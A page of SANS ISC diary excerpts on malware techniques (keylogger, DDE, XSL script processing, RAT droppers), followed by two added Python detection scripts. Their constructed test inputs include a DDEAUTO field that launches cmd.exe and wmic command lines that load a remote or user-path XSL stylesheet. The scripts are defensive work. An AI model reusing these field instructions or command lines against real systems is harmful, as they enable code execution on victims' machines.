[SANS ISC] Simple Python Keylogger

I published the following diary on isc.sans.edu: “Simple Python Keylogger”: A keylogger is one of the core features implemented by many malware families to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, …), just by having a look at

The post [SANS ISC] Simple Python Keylogger appeared first on /dev/random.

[SANS ISC] Defenders, Know Your Operating System Like Attackers Do!

I published the following diary on isc.sans.edu: “Defenders, Know Your Operating System Like Attackers Do!”: Not a technical diary today but more a reflection… When I’m teaching FOR610, I always remind students to “RTFM” or “Read the F… Manual”. I mean to not hesitate to have a look at the

[SANS ISC] Spotting the Red Team on VirusTotal!

I published the following diary on isc.sans.edu: “Spotting the Red Team on VirusTotal!”: Many security researchers like to use the VirusTotal platform. The provided services are amazing: You can immediately have a clear overview of how dangerous a file is but… VirusTotal remains a cloud service. It means that, once you have uploaded a

[ISC SANS] Spam Farm Spotted in the Wild

I published the following diary on isc.sans.edu: “Spam Farm Spotted in the Wild”: If there is a place where you can always find juicy information, it’s your spam folder! Yes, I like spam and I don’t delete my spam before having a look at it for hunting purposes. Besides emails flagged as spam, NDR or

[SANS ISC] From VBS, PowerShell, C Sharp, Process Hollowing to RAT

I published the following diary on isc.sans.edu: “From VBS, PowerShell, C Sharp, Process Hollowing to RAT”: VBS files are an interesting way to deliver malicious content to a victim’s computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it also looks like Russian

[SANS ISC] Dynamic Data Exchange (DDE) is Back in the Wild?

I published the following diary on isc.sans.edu: “Dynamic Data Exchange (DDE) is Back in the Wild?”: DDE or “Dynamic Data Exchange” is a Microsoft technology for interprocess communication used in early versions of Windows and OS/2. DDE allows programs to manipulate objects provided by other programs, and respond to user actions affecting those objects. For a while,

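As an added illustration of the technique behind this diary (example code, not part of the diary and not code from the ISC or /dev/random), here is a small Python scanner that looks for DDE and DDEAUTO field instructions inside a .docx package, which is where a malicious document carries the command DDE will launch when the field is evaluated. It parses the WordprocessingML field runs rather than grepping the raw XML, so a keyword split across several `<w:instrText>` runs ("DDE" + "AUTO") is still caught. The document it scans is constructed inline for the demonstration and is not a real sample.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# A field instruction starting with DDEAUTO fires when the document is opened,
# DDE when the field is updated. Match either keyword anywhere in the instruction.
DDE_FIELD_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)

# Package parts in which Word stores field instructions.
SCAN_PARTS_RE = re.compile(r"^word/(document|header\d*|footer\d*|footnotes|endnotes|comments)\.xml$")


def extract_field_instructions(xml_bytes):
    """Return the instruction text of every field in one WordprocessingML part.

    Complex fields are bracketed by <w:fldChar w:fldCharType="begin"/> and "end",
    with the instruction spread over one or more <w:instrText> runs; the runs are
    joined so a keyword split across runs ("DDE" + "AUTO") is still seen whole.
    Simple fields keep their instruction in the w:instr attribute of <w:fldSimple>.
    """
    root = ET.fromstring(xml_bytes)
    fields = []
    stack = []  # one text buffer per open (possibly nested) complex field
    for el in root.iter():
        if el.tag == W + "fldSimple":
            fields.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                fields.append("".join(stack.pop()))
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
    fields.extend("".join(buf) for buf in stack)  # unterminated fields still count
    return [" ".join(f.split()) for f in fields if f.strip()]


def scan_docx(docx_bytes):
    """Return (part_name, instruction) for every DDE/DDEAUTO field in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if SCAN_PARTS_RE.match(name):
                for instr in extract_field_instructions(zf.read(name)):
                    if DDE_FIELD_RE.search(instr):
                        hits.append((name, instr))
    return hits


def build_sample_docx(body_xml):
    """Constructed test input (not a real sample): a minimal .docx around body_xml."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s"><w:body>%s</w:body></w:document>' % (W_NS, body_xml)
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.'
        'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed body: a DDEAUTO field split over two runs that launches cmd.exe,
# followed by a benign PAGE field that must not be reported.
MALICIOUS_BODY = (
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\\\windows\\\\system32\\\\cmd.exe '
    '"/k calc.exe" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Loading...</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    '<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
)
BENIGN_BODY = '<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'

if __name__ == "__main__":
    for name, instr in scan_docx(build_sample_docx(MALICIOUS_BODY)):
        print("%s: %s" % (name, instr))
```

The scanner only reports the field instruction; it does not evaluate it. On a real sample, expect the launched program and its arguments to be obfuscated (QUOTE fields, split runs, Unicode tricks), which is why the joined instruction text, not the raw XML, is what gets matched.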

[SANS ISC] Agent Tesla Dropped Through Automatic Click in Microsoft Help File

I published the following diary on isc.sans.edu: “Agent Tesla Dropped Through Automatic Click in Microsoft Help File”: Attackers have plenty of resources to infect our systems. If some files may look suspicious because the extension is less common (like .xsl files), others look really safe and make the victim confident

Arrest, Raids Tied to ‘U-Admin’ Phishing Kit

Cyber cops in Ukraine carried out an arrest and several raids last week in connection with the author of U-Admin, a software package used to administer what’s being called “one of the world’s largest phishing services.” The operation was carried out in coordination with the FBI and authorities in Australia, which was particularly hard hit by phishing scams perpetrated by U-Admin customers.

[SANS ISC] VBA Macro Trying to Alter the Application Menus

I published the following diary on isc.sans.edu: “VBA Macro Trying to Alter the Application Menus”: Who remembers the worm Melissa? It started to spread in March 1999! In information security, that sounds like prehistory, but I spotted a VBA macro that tried to use the same defensive technique

[SANS ISC] New Example of XSL Script Processing aka “Mitre T1220”

I published the following diary on isc.sans.edu: “New Example of XSL Script Processing aka ‘Mitre T1220’”: Last week, Brad posted a diary about TA551. A few days later, one of our readers submitted another sample belonging to the same campaign. Brad had a look at the traffic so I decided

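MITRE ATT&CK T1220 covers running script embedded in an XSL stylesheet through a trusted binary, typically wmic.exe with a /format:<stylesheet> switch pointing at an attacker-supplied file or URL, or the standalone msxsl.exe utility. As an added detection example (Python, written for this page, not code from the diary or from the TA551 sample), the classifier below runs over process-creation command lines: a wmic /format target that is not one of WMIC's own built-in stylesheet names, or any execution of msxsl.exe, is flagged. The command lines it scans are constructed for the demonstration, not real telemetry.

```python
import re

# Stylesheet names WMIC resolves to its own files under %SystemRoot%\System32\wbem
# (csv.xsl, hform.xsl, ...). Anything else passed to /format is worth a look.
WMIC_BUILTIN_FORMATS = {
    "csv", "hform", "htable", "htable-sortby", "list", "mof", "rawxml",
    "table", "texttablewsys", "textvaluelist", "value", "xml",
}

# /format:<name> or /format:"quoted path or URL"; WMIC switches are case-insensitive.
FORMAT_SWITCH_RE = re.compile(r"""/format\s*:\s*(?:"([^"]*)"|'([^']*)'|(\S+))""", re.IGNORECASE)


def image_name(cmdline):
    """Lower-cased file name of the first token (quoted or bare, any path separators)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    token = (m.group(1) or m.group(2)) if m else ""
    return re.split(r"[\\/]", token)[-1].lower()


def classify_command_line(cmdline):
    """Return a reason string when the command line matches T1220 tradecraft, else None."""
    image = image_name(cmdline)
    if image in ("msxsl.exe", "msxsl"):
        # msxsl.exe is a separate Microsoft download, not a Windows component, so
        # seeing it run at all on an ordinary endpoint is notable.
        return "msxsl.exe executed: %s" % cmdline.strip()
    if image in ("wmic.exe", "wmic"):
        m = FORMAT_SWITCH_RE.search(cmdline)
        if m:
            target = next(g for g in m.groups() if g is not None)
            # Bare built-in names are trusted here; this check does not verify which
            # file WMIC actually loaded from disk. URLs, paths and other names are flagged.
            if target.lower() not in WMIC_BUILTIN_FORMATS:
                return "wmic /format with non-built-in stylesheet: %s" % target
    return None


def scan_process_events(cmdlines):
    """Run the classifier over process-creation command lines; return (cmdline, reason) hits."""
    hits = []
    for line in cmdlines:
        reason = classify_command_line(line)
        if reason:
            hits.append((line, reason))
    return hits


# Constructed command lines (not real telemetry); 203.0.113.10 is a documentation-range address.
SAMPLE_PROCESS_EVENTS = [
    r'C:\Windows\System32\wbem\WMIC.exe os get /format:list',
    r'wmic process list brief /format:"https://203.0.113.10/update.xsl"',
    r'"C:\Windows\System32\wbem\wmic.exe" computersystem get /FORMAT:"C:\Users\Public\report.xsl"',
    r'C:\Users\Public\msxsl.exe data.xml payload.xsl',
    r'C:\Windows\System32\cmd.exe /c dir',
]

if __name__ == "__main__":
    for line, reason in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print("ALERT %s\n      %s" % (reason, line))
```

Of the five constructed events, the first (a built-in format) and the last (plain cmd.exe) pass; the remote stylesheet, the stylesheet in a user-writable path, and the msxsl.exe execution are reported. In production the same logic belongs in a process-creation rule (Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled), and the built-in allow-list should be reviewed against the wbem directory of the Windows build in use.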